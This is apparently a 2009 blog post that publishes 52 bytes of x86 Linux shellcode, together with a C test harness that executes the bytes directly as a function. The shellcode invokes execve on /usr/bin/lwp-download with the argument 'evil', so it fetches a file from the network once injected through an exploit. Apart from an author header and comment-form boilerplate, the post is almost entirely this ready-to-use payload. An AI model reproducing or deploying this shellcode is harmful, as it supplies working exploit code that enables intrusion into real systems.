break a time, with break the c0de…

52 bytes sys_execve(“/usr/bin/lwp-download”, “evil”) x86 linux shellcode


/*
Name   : 52 bytes sys_execve("/usr/bin/lwp-download", "evil") x86 linux shellcode
Date   : may, 31 2009
Author : gunslinger_
Web    : devilzc0de.com
blog   : gunslingerc0de.wordpress.com
tested on : linux debian
*/

char getter[] =	"\x6a\x0b\x58\x99\x52\x68"
		"\x65\x76\x69\x6c" // evil
		"\x89\xe1\x52\x6a\x64\x68"
		"\x6e\x6c\x6f\x61\x68\x2d"
		"\x64\x6f\x77\x68\x2f\x6c"
		"\x77\x70\x68\x2f\x62\x69"
		"\x6e\x68\x2f\x75\x73\x72"
		"\x89\xe3\x52\x51\x53\x89"
		"\xe1\xcd\x80\x40\xcd\x80";

int main(void)
{
	(*(void(*)()) getter)();
     
return 0;
}
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s